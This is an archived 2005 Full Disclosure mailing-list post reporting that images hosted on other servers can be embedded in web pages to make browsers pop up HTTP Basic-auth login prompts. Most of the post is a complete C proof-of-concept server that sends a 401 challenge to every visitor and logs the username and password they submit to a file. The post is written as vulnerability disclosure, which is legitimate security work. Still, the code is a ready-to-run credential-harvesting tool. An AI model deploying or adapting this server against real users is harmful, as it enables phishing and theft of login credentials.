Full Disclosure mailing list archives
Cross-site http authentication
From: JustAsFire <justasfire () gmail com>
Date: Wed, 10 Aug 2005 19:18:52 +0300
Discovered: by JustAsFire JustAsFire () gmail com Vulnerable: Any web page in which you can insert images hosted on other servers. Description: If a web page contains an image from a site which requires authentication, an Username/Password prompt displaying host name and authentication realm will appear asking for username and password. A malicious http server could be used to log the credientials of the users who would authenticate. POC: /******************************************************************************* ***name : AuthServer.c ***author : JustAsFire JustAsFire[at]gmail.com ***description : a very simple web server which sends a 401 Authorization request to anyone *** connecting to it. If the client authetificates it stores the username and password *** in the file userlog(encrypted in base64). *** *** *********************************************************************************/ #include <stdio.h> #include <sys/socket.h> #include <arpa/inet.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <netinet/in.h> #define MAXPENDING 5 #define BUFFSIZE 10000 void Die(char *mess) { perror(mess); exit(1); } int GetCredientials(char *buffer){ char s[200], *p; int i; FILE *f; p=strstr(buffer, "Authorization: Basic "); if (p){ if ( strlen(p)>50 ){ printf("Buffer overflow atempt"); return 0; } for (i=0; i+25 < strlen(p); i++) s[i]=p[21+i]; printf("\n%s\n",s); f=fopen("userlog", "a"); fprintf(f,"%s\n",s); fclose(f); return 1; } else return 0; } void HandleClient(int sock){ char buffer[BUFFSIZE]; char *s; if (read(sock, buffer, BUFFSIZE) <0) Die("Failed to receive bytes from client"); if ( GetCredientials(buffer)==0 ){ char *s="HTTP/1.1 401 Authorization Require\nServer: AuthServer/0.01 (Unix)\nWWW-Authenticate: Basic realm=\" ...It's a scam don't do it... \"\nKeep-Alive: timeout=15, max=100\nConnection: Keep-Alive\nTransfer-Encoding: chunked\nContent-Type: text/html; charset=iso-8859-1\n\n"; write(sock,s,strlen(s)); } close(sock); } int main (int argc, char *argv[]) { int serversock, clientsock; struct sockaddr_in server, client; if ( argc != 2 ) { fprintf(stderr, "USAGE: AuthServer <port>\n"); exit(1); } if ((serversock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) { Die("Failed to create socket"); } memset(&server, 0, sizeof(server)); server.sin_family = AF_INET; server.sin_addr.s_addr = htonl(INADDR_ANY); server.sin_port = htons(atoi(argv[1])); if (bind(serversock, (struct sockaddr *) &server, sizeof(server)) < 0) { Die("Failed to bind the server socket"); } if (listen(serversock, MAXPENDING) < 0) { Die("Failed to listen on server socket"); } fprintf(stdout,"Created by: JustAsFire -- JustAsFire[at]gmail.com\n"); fprintf(stdout,"Listening for connections...\n"); while (1) { unsigned int clientlen = sizeof(client); if ((clientsock = accept(serversock, (struct sockaddr *) &client, &clientlen)) < 0) { Die("Failed to accept client connection"); } fprintf(stdout, "Client connected: %s\n", inet_ntoa(client.sin_addr)); HandleClient(clientsock); } } _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Cross-site http authentication JustAsFire (Aug 10)